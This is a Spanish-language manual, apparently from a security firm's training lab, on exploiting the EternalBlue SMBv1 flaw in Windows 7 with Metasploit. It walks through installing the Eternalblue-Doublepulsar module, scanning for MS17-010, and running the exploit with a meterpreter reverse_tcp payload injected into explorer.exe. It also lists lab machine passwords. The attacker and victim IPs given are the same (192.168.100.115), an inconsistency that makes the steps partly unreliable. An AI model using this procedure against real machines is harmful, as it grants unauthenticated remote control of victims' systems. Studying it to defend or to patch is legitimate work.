Sunteți pe pagina 1din 6

593-983581978 jbastidas@greenetics.

com
www.greenetics.com.ec

MANUAL DE EXPLOIT ETERNALBLUE

Introducción

EternalBlue es una herramienta que permite aprovechar la vulnerabilidad en el protocolo


SMB versión 1, y de esta manera poder ejecutar código remoto (RCE) sobre la máquina
víctima consiguiendo acceso al sistema.
El exploit hace un ataque directo a máquinas Windows, además de tener la ventaja de no
requerir autenticación. Este exploit fue empleado para la propagación del ransomeware
Wanna Cry el día 12 de mayo.

Requisitos

 Metasploit a la versión 4.14.27


 Wine de 32 y 64 bits

Actualización de Metasploit

1.- Dirigirse a la página de Kali Linux para actualizar la lista de repositorios para descarga
de actualizaciones

https://docs.kali.org/general-use/kali-linux-sources-list-repositories

2.- Buscar la opción Kali Rolling Repository y copiar la línea deb


http://http.kali.org/kali kali-rolling main contrib non-free al archivo source.list ubicado
en /etc/apt/source.list y comentar las demás líneas que habían en el archivo.
593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

3.- Aplicar el comando msfupdate

4.- Una vez terminada la actualización, se abre la consola de metasploit con el comando
msfconsole para comprobar la nueva versión.
593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

Instalación de Wine

Aplicar los siguientes comandos:

apt-get update -y
apt-get install wine -y
apt-get install winetricks -y
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 -y --fix-missing

Configuración de Eternalblue

1.- Descargar el exploit desde el sitio de github:

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

2.- Una vez descargado el exploit se obtendrá un directorio Eternalblue-Doublepulsar-


Metasploit, cambiarse a dicho directorio y copiar el archivo eternalblue_doubleplusar.rb
a la siguiente ruta:

/usr/share/metasploit-framework/modules/exploits/windows/smb

3.- Crear el directorio drive_c

mkdir -p /root/.wine/drive_c/
593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

Utilización del Exploit

El exploit se configura y ejecuta desde la consola de Metasploit, en primer lugar se debe


seleccionar una víctima que tenga un sistema operativo de Windows 7,
independientemente de la arquitectura. Una vez seleccionada la víctima se procede a
probar si la víctima es vulnerable a la vulnerabilidad SMB 1, para lo cual seguimos el
siguiente procedimiento:

1.- Abrir la consola de Metasploit, con el comando msfconsole

2.- Emplear el módulo de escaneo: smb_ms17_010

3.- Configurar el host (víctima) con el comando set RHOSTS 192.168.100.127, donde
192.168.100.127 es la dirección IP de la víctima.

4.- Ejecutar el exploit con el comando exploit

Una vez que se ha comprobado que el host escaneado es vulnerable, se procede a


emplear el exploit siguiendo los siguientes pasos:

1.- Emplear el módulo Eternalbluedoblupulsar, con el comando:

use exploit/windows/smb/eternalblue_doublepulsar
593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

2. - Configurar el PAYLOAD, dependiendo de la arquitectura de la víctima aplicar el


payload correspondiente

set PAYLOAD windows/x64/meterpreter/reverse_tcp >> Windows de 64 bits


set PAYLOAD windows/meterpreter/reverse_tcp >> Windows de 32 bits

3.- Configurar la víctima

set RHOST 192.168.100.115

4.- Configurar la máquina que escucha la conexión (atacante)

set LHOST 192.168.100.115

5.- Configurar el nombre del proceso donde se va a crear el exploit

set PROCESSINJECT explorer.exe

6.- Ejecutar el exploit, con el comando exploit


593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

Máquinas Virtuales:

Víctima:
 Windows Sandbox
 Sistema Operativo Windows 7 de 32 bits
 Clave de ingreso: root123

Windows Server 2008 R2


Clave de acceso adMin123$

Atacante:
 EternalBlue
 Sistema Operativo kali Linux de 64 bits
 Usuario: root, Clave: Greenetics

Información de versiones de Windows

S-ar putea să vă placă și